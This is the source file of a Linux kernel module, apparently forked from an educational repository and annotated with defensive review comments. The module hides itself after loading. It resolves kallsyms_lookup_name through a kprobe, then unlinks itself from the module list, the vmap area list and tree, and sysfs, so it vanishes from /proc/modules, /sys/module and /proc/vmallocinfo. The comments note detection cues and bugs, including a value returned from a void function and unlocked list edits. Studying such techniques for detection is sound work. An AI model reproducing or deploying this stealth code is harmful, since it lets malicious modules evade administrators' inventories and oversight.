forked from sysprog21/lkm-hidden
main.c
#include <linux/kallsyms.h>
#include <linux/module.h>
#include <linux/slab.h>
#include <linux/vmalloc.h>
#include <linux/version.h>
#if LINUX_VERSION_CODE >= KERNEL_VERSION(5, 7, 0)
/*
 * On 5.7 and later this file does not call kallsyms_lookup_name() directly.
 * It registers a kprobe on that symbol name and reads the resolved address
 * back from kp.addr (see hide_myself()).
 * NOTE(review): presumably needed because the symbol is not exported to
 * modules on those kernels - confirm against the kernel sources in use.
 * For detection: a kprobe registered on "kallsyms_lookup_name" by an
 * out-of-tree module is the visible side effect of this lookup path.
 */
#define KPROBE_LOOKUP 1
#include <linux/kprobes.h>
static struct kprobe kp = {
    .symbol_name = "kallsyms_lookup_name",
};
#endif
/* Module metadata recorded in the built .ko. */
MODULE_LICENSE("GPL");
MODULE_AUTHOR("National Cheng Kung University, Taiwan");
MODULE_DESCRIPTION("Catch Me If You Can");
/*
 * Unlink this module from the kernel bookkeeping that the code below touches:
 * the vmap area list and red-black tree, the global module list, the module's
 * sysfs kobject, and its module_use dependency records.
 *
 * Takes no arguments and is declared to return nothing.
 *
 * Review notes (defensive reading):
 *  - After this runs, the views named in the comments below (/proc/modules,
 *    /sys/module, /proc/vmallocinfo) no longer list the module, so an
 *    inventory built from those views alone will not show it. Cross-check
 *    against sources this function does not touch.
 *  - No lock is taken in this function around any of the list or tree edits.
 *    NOTE(review): the kernel normally serialises access to these
 *    structures; unsynchronised edits may corrupt them - confirm.
 *  - Neither lookup result is checked for 0 before being dereferenced.
 */
static void __init hide_myself(void)
{
    struct vmap_area *va, *vtmp;
    struct module_use *use, *tmp;
    struct list_head *_vmap_area_list;
    struct rb_root *_vmap_area_root;
#ifdef KPROBE_LOOKUP
    /* Local function pointer that shadows the kernel's kallsyms_lookup_name. */
    unsigned long (*kallsyms_lookup_name)(const char *name);
    int ret;
    ret = register_kprobe(&kp);
    /*
     * NOTE(review): this function is declared void, so returning a value
     * here is a constraint violation that compilers diagnose; the error
     * code also never reaches hide_init().
     */
    if (ret < 0)
        return ret;
    /* kp.addr holds the address the kprobe resolved for the symbol name. */
    kallsyms_lookup_name = (unsigned long (*)(const char *name)) kp.addr;
    /* The probe was only needed for address resolution; drop it again. */
    unregister_kprobe(&kp);
#endif
    /* Resolve two symbols by name: the vmap area list head and tree root. */
    _vmap_area_list =
        (struct list_head *) kallsyms_lookup_name("vmap_area_list");
    _vmap_area_root = (struct rb_root *) kallsyms_lookup_name("vmap_area_root");
    /*
     * Hide from /proc/vmallocinfo: unlink every vmap area whose
     * [va_start, va_end] range strictly contains the address of THIS_MODULE.
     * The _safe iterator is used because entries are deleted while walking.
     */
    list_for_each_entry_safe (va, vtmp, _vmap_area_list, list) {
        if ((unsigned long) THIS_MODULE > va->va_start &&
            (unsigned long) THIS_MODULE < va->va_end) {
            list_del(&va->list);
            /* remove from red-black tree */
            rb_erase(&va->rb_node, _vmap_area_root);
        }
    }
    /* Hide from /proc/modules: unlink from the list THIS_MODULE->list is on. */
    list_del_init(&THIS_MODULE->list);
    /* Hide from /sys/module: delete the module's kobject. */
    kobject_del(&THIS_MODULE->mkobj.kobj);
    /*
     * Decouple the dependency records: for each module_use entry on this
     * module's target_list, unlink it from both lists, remove the sysfs
     * link named after this module from the target's holders directory,
     * and free the record.
     */
    list_for_each_entry_safe (use, tmp, &THIS_MODULE->target_list,
                              target_list) {
        list_del(&use->source_list);
        list_del(&use->target_list);
        sysfs_remove_link(use->target->holders_dir, THIS_MODULE->name);
        kfree(use);
    }
}
/*
 * Module load entry point: runs hide_myself(), logs the address of
 * THIS_MODULE, and returns 0 unconditionally. hide_myself() is void, so a
 * failed lookup inside it is not reported to the module loader.
 */
static int __init hide_init(void)
{
    hide_myself();
    /*
     * Debug trace left in the kernel log at load time. The format string has
     * no log level prefix and no trailing newline.
     * NOTE(review): recent kernels hash "%p" output by default, so the
     * printed value may not be the real address - confirm.
     */
    printk("this: %p", THIS_MODULE); /* TODO: remove this line */
    return 0;
}
/*
 * Module unload entry point. Empty: nothing that hide_myself() unlinked is
 * restored here.
 */
static void __exit hide_exit(void) {}
/* Register hide_init and hide_exit as the module's load and unload handlers. */
module_init(hide_init);
module_exit(hide_exit);